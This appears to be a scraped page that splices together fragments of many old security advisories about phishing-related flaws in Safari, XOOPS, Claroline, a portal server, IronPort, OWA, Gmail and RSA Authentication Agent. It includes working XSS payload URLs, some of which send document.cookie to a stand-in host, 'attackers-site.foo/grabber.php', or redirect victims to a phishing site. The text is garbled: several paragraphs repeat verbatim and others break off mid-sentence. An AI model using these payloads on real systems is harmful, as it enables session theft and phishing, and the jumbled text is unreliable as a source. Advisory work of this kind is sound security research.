Next Page >>
phishing
Version: 7.5.0
Hardware: Tomcat/Oracle
Vulnerability: Cross-Site Scripting, Phishing Through Frames,
Application Error
Overview:
next time you use Safari Top Sites, it will be have the attacker's defined
sites replace your existing legitimate sites. To make this decision of which
sites to replace with, an attacker can first use the CSS History Hack found
by Jeremiah Grossman[2] and then accordingly set fake sites relative to
those user's visited websites. Hence, this could easily facilitate a serious
phishing attack. The situation is worsened by the Safari's inadequate
protection against URL obfuscation attacks as highlighted in [3], which
makes it almost impossible for a regular user to spot the fake site and
differentiate it from a legitimate one.
V. PROOF OF CONCEPT
This may be a little off-topic, but hopefully still of interest to this
audience,
Last Friday I had the opportunity to moderate a panel - Political
Phishing - A Threat to the 2008 Campaign? - held as part of the
Anti-Phishing Working Group eCrime Researchers Summit hosted by Carnegie
Mellon CyLab in Pittsburgh, PA. Our panelists were Rachna Dhamija from
Harvard University, Chris Soghoian from Indiana University , and Pat
Clarke of Jackson/Clark Partners. We had some great discussion on the
potential impact of Internet-borne threats to the upcoming US
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Onapsis Security Advisory 2010-004: SAP J2EE Authentication Phishing Vector
This advisory can be downloaded from http://www.onapsis.com/research.html.
By downloading this advisory from the Onapsis Resource Center, you will
gain access to beforehand information on upcoming advisories, presentations
and new research projects from the Onapsis Research Labs.
Application: Claroline eLearning and eWorking platform
Versions Affected: 1.8.9
Vendor URL: http://www.claroline.net/
Bug: Multiple XSS, Phishing Through URL Redirection, Change User Password XSRF Vulnerability
Exploits: YES
Reported: 04.07.2008
Vendor Response: 07.07.2008
Solution: YES
Date of Public Advisory: 18.07.2008
Authentication Agent was mentioned to be vulnerable. Additionally,
nothing was said regarding the possibility of exploiting this XSS as a
GET request (as opposed to POST). Therefore, the vulnerability can be
exploited via a malicious URL, since visiting a URL results in the web
browser submitting a GET request. Since the XSS condition occurs on the
login page, the bug is highly suitable for advanced XSS phishing attacks
as illustrated in the proof of concept below. Please note that this is
issue is different from CAN-2003-0389 and CVE-2005-3329.
Simple XSS Proof of Concept (PoC) URLs:
Authentication Agent was mentioned to be vulnerable. Additionally,
nothing was said regarding the possibility of exploiting this XSS as a
GET request (as opposed to POST). Therefore, the vulnerability can be
exploited via a malicious URL, since visiting a URL results in the web
browser submitting a GET request. Since the XSS condition occurs on the
login page, the bug is highly suitable for advanced XSS phishing attacks
as illustrated in the proof of concept below. Please note that this is
issue is different from CAN-2003-0389 and CVE-2005-3329.
Simple XSS Proof of Concept (PoC) URLs:
Authentication Agent was mentioned to be vulnerable. Additionally,
nothing was said regarding the possibility of exploiting this XSS as a
GET request (as opposed to POST). Therefore, the vulnerability can be
exploited via a malicious URL, since visiting a URL results in the web
browser submitting a GET request. Since the XSS condition occurs on the
login page, the bug is highly suitable for advanced XSS phishing attacks
as illustrated in the proof of concept below. Please note that this is
issue is different from CAN-2003-0389 and CVE-2005-3329.
Simple XSS Proof of Concept (PoC) URLs:
Authentication Agent was mentioned to be vulnerable. Additionally,
nothing was said regarding the possibility of exploiting this XSS as a
GET request (as opposed to POST). Therefore, the vulnerability can be
exploited via a malicious URL, since visiting a URL results in the web
browser submitting a GET request. Since the XSS condition occurs on the
login page, the bug is highly suitable for advanced XSS phishing attacks
as illustrated in the proof of concept below. Please note that this is
issue is different from CAN-2003-0389 and CVE-2005-3329.
Simple XSS Proof of Concept (PoC) URLs:
Application: XOOPS
Versions Affected: XOOPS 2.0.18
Vendor URL: http://www.xoops.org/
Bugs: Local File Include,URL Redirecting phishing
Exploits: YES
Reported: 28.01.2008
Vendor response: 28.01.2008
Date of Public Advisory: 04.02.2008
Authors: Alexandr Polyakov, Stas Svistunovich
https://target-domain.foo/portal/server.pt?open=space&name=</SCRIPT><script>window.location="http://attackers-site.foo/grabber.php?c="%2bdocument.cookie</script>
http://target-domain.foo/portal/server.pt?open=space&name=%22;}%3C/script%3E%3Cscript%3Ewindow.location="http://attackers-site.foo/grabber.php?c="%2bdocument.cookie%3C/script%3E%3C!--
The following requests allow password theft by redirecting to a
third-party 'spoof' site which would perform a phishing attack on the
victim:
https://target-domain.foo/portal/server.pt?open=space&name=</SCRIPT><script>window.location="http://phishers-site.foo"</script>
http://target-domain.foo/portal/server.pt?open=space&name=%22;}%3C/script%3E%3Cscript%3Ewindow.location="http://phishers-site.foo%3C/script%3E%3C!--
attacker could send requests to other applications, authenticated as the
user. (CVE-2009-3983)
Jonathan Morgan discovered that Firefox did not properly display SSL
indicators under certain circumstances. This could be used by an attacker
to spoof an encrypted page, such as in a phishing attack. (CVE-2009-3984)
Jordi Chancel discovered that Firefox did not properly display invalid URLs
for a blank page. If a user were tricked into accessing a malicious
website, an attacker could exploit this to spoof the location bar, such as
in a phishing attack. (CVE-2009-3985)
attacker could send requests to other applications, authenticated as the
user. (CVE-2009-3983)
Jonathan Morgan discovered that Firefox did not properly display SSL
indicators under certain circumstances. This could be used by an attacker
to spoof an encrypted page, such as in a phishing attack. (CVE-2009-3984)
Jordi Chancel discovered that Firefox did not properly display invalid URLs
for a blank page. If a user were tricked into accessing a malicious
website, an attacker could exploit this to spoof the location bar, such as
in a phishing attack. (CVE-2009-3985)
attacker could send requests to other applications, authenticated as the
user. (CVE-2009-3983)
Jonathan Morgan discovered that Firefox did not properly display SSL
indicators under certain circumstances. This could be used by an attacker
to spoof an encrypted page, such as in a phishing attack. (CVE-2009-3984)
Jordi Chancel discovered that Firefox did not properly display invalid URLs
for a blank page. If a user were tricked into accessing a malicious
website, an attacker could exploit this to spoof the location bar, such as
in a phishing attack. (CVE-2009-3985)
attacker could send requests to other applications, authenticated as the
user. (CVE-2009-3983)
Jonathan Morgan discovered that Firefox did not properly display SSL
indicators under certain circumstances. This could be used by an attacker
to spoof an encrypted page, such as in a phishing attack. (CVE-2009-3984)
Jordi Chancel discovered that Firefox did not properly display invalid URLs
for a blank page. If a user were tricked into accessing a malicious
website, an attacker could exploit this to spoof the location bar, such as
in a phishing attack. (CVE-2009-3985)
By modifying the contents of intercepted secure e-mail messages or by
forging a close copy of the e-mail message, it may be possible for an
attacker to convince a user to view a modified secure e-mail message
and then cause the exposure of the user's credentials and message
content. Please see the Workarounds section for more information on
mitigations available to reduce exposure to these phishing-style
attacks. This vulnerability is documented in IronPort bug 8149 and
has been assigned Common Vulnerabilities and Exposures (CVE)
identifier CVE-2009-0054.
IronPort Encryption Appliance Administration Interface Vulnerabilities
Type: Cross Site Scripting (XSS)
Remote: Yes
Credit: Yaniv Miron aka "Lament"
Exploit:
http://SERVER_ADDRESS/Aris/wflogin.jsp?errmsg=Phishing Error Message<script>alert('Malicious XSS Code')</script>
Yaniv Miron aka "Lament".
lament@ilhack.org
==========================================================================================
------------------------------------------------
Multiple Vulnerabilities in EASY Enterprise DMS
- Stored XSS
- XSS
- Content Injection / Phishing through Frames
- Unauthorized access to files
- Unauthorized manipulation of data
Date: 25.03.2010
------------------------------------------------
> Date: Tue, 10 Apr 2007 15:40:13 +0200
>
> Hello,
>
> I found a weakness in Microsoft Outlook Web Access (OWA), which
> potentially can be exploited by malicious people to conduct phishing
> attacks.
> The weakness is caused due to a design error in the way OWA uses an
> unverified user supplied argument to redirect a user after successful
> authentication.
> This can e.g. be exploited by tricking a user into following a link from
>>> Date: Tue, 10 Apr 2007 15:40:13 +0200
>>>
>>> Hello,
>>>
>>> I found a weakness in Microsoft Outlook Web Access (OWA), which
>>> potentially can be exploited by malicious people to conduct phishing
>>> attacks.
>>> The weakness is caused due to a design error in the way OWA uses an
>>> unverified user supplied argument to redirect a user after successful
>>> authentication.
>>> This can e.g. be exploited by tricking a user into following a link from
>> Date: Tue, 10 Apr 2007 15:40:13 +0200
>>
>> Hello,
>>
>> I found a weakness in Microsoft Outlook Web Access (OWA), which
>> potentially can be exploited by malicious people to conduct phishing
>> attacks.
>> The weakness is caused due to a design error in the way OWA uses an
>> unverified user supplied argument to redirect a user after successful
>> authentication.
>> This can e.g. be exploited by tricking a user into following a link from
>> Date: Tue, 10 Apr 2007 15:40:13 +0200
>>
>> Hello,
>>
>> I found a weakness in Microsoft Outlook Web Access (OWA), which
>> potentially can be exploited by malicious people to conduct phishing
>> attacks.
>> The weakness is caused due to a design error in the way OWA uses an
>> unverified user supplied argument to redirect a user after successful
>> authentication.
>> This can e.g. be exploited by tricking a user into following a link
Date: Tue, 10 Apr 2007 15:40:13 +0200
Hello,
I found a weakness in Microsoft Outlook Web Access (OWA), which
potentially can be exploited by malicious people to conduct phishing
attacks.
The weakness is caused due to a design error in the way OWA uses an
unverified user supplied argument to redirect a user after successful
authentication.
This can e.g. be exploited by tricking a user into following a link from
> Date: Tue, 10 Apr 2007 15:40:13 +0200
>
> Hello,
>
> I found a weakness in Microsoft Outlook Web Access (OWA), which
> potentially can be exploited by malicious people to conduct phishing
> attacks.
> The weakness is caused due to a design error in the way OWA uses an
> unverified user supplied argument to redirect a user after successful
> authentication.
> This can e.g. be exploited by tricking a user into following a link from
Vulnerability Report:
As part of our recent work on the trust hierarchy that exists among email providers throughout the Internet, we have uncovered a serious security flaw in Ggoogle's free email service, Gmail. This vulnerability exposes Google's email servers in a way that allows an attacker to use them as open spam and phishing relays. This issue is related to the risk of a malicious user abusing Gmail's email forwarding functionality. This is possible because Gmail's email forwarding functionality does not impose proper security restrictions during its setup process and can be easily subverted. By exploiting this problem an attacker can send unlimited spam and phishing (i.e. forged) email messages that are delivered by Google's very own SMTP servers. Since the messages are delivered by Google's own servers, an attack based on this flaw is able to bypass all spam filters that are based on the blacklist / whitelist concept. We were able to confirm that this vulnerability is indeed exploitable b
y crafting a proof of concept attack that allowed us to send any number of forged email messages without restriction through Google's server infrastructure. We have also verified that this flaw allows attackers to bypass spam filters by using our method to send messages that are usually flagged as spam. While sending these messages directly from our network in the traditional way had the messages classified as spam, by sending the very same messages using our exploit, the messages were delivered directly to the victim's inbox, thus bypassing filters.
Impact:
All email providers that offer Google's SMTP servers any special level of trust (e.g. whitelist status) are vulnerable.
On Wed, 7 May 2008 pablo.ximenes@upr.edu wrote:
>
> Vulnerability Report:
>
> As part of our recent work on the trust hierarchy that exists among email providers throughout the Internet, we have uncovered a serious security flaw in Ggoogle's free email service, Gmail. This vulnerability exposes Google's email servers in a way that allows an attacker to use them as open spam and phishing relays. This issue is related to the risk of a malicious user abusing Gmail's email forwarding functionality. This is possible because Gmail's email forwarding functionality does not impose proper security restrictions during its setup process and can be easily subverted. By exploiting this problem an attacker can send unlimited spam and phishing (i.e. forged) email messages that are delivered by Google's very own SMTP servers. Since the messages are delivered by Google's own servers, an attack based on this flaw is able to bypass all spam filters that are based on the blacklist / whitelist concept. We were able to confirm that this vulnerability is indeed exploitable b
> y crafting a proof of concept attack that allowed us to send any number of forged email messages without restriction through Google's server infrastructure. We have also verified that this flaw allows attackers to bypass spam filters by using our method to send messages that are usually flagged as spam. While sending these messages directly from our network in the traditional way had the messages classified as spam, by sending the very same messages using our exploit, the messages were delivered directly to the victim's inbox, thus bypassing filters.
>
> Impact:
>
> All email providers that offer Google's SMTP servers any special level of trust (e.g. whitelist status) are vulnerable.
A remote URI redirection vulnerability affects the RSA Authentication
Agent. This issue is due to a failure of the application to properly
sanitize URI-supplied data assigned to the 'url' parameter.
An attacker may leverage this issue to carry out convincing phishing
attacks against unsuspecting users by causing an arbitrary page to be
loaded once a RSA Authentication Agent specially-crafted URL is visited.
Although the 'url' parameter is filtered for protocol URLs such as
'http://' and 'https://', is NOT filtered for other protocols such as
A remote URI redirection vulnerability affects the RSA Authentication
Agent. This issue is due to a failure of the application to properly
sanitize URI-supplied data assigned to the 'url' parameter.
An attacker may leverage this issue to carry out convincing phishing
attacks against unsuspecting users by causing an arbitrary page to be
loaded once a RSA Authentication Agent specially-crafted URL is visited.
Although the 'url' parameter is filtered for protocol URLs such as
'http://' and 'https://', is NOT filtered for other protocols such as
Manager. This type of attack can result in non-persistent defacement of
the target site, or the redirection of confidential information to
unauthorised third parties.
- An attacker may inject frames that embed third-party sites, which can
help launching phishing attacks by injecting a frame that points to a
"spoof" login page. Non-persistent defacement of the target site is also
possible.
- An attacker can redirect victim users to third-party sites after a
successful logon. Such behaviour can help attackers perform phishing
The following are some attack scenarios in which this vulnerability
could be used for:
- annoyance or prank purposes
- advanced phishing attacks in which the victims gets a phone call
from "Trusted Bank" after clicking on a link included in the phishing
email. The fact that the attacker calls the victim's phone number
would help him/her gain the victim's trust. HINT: Phishers usually
don't know your phone number!
- toll fraud attacks in which the victim calls one of those very
Next Page>>
|
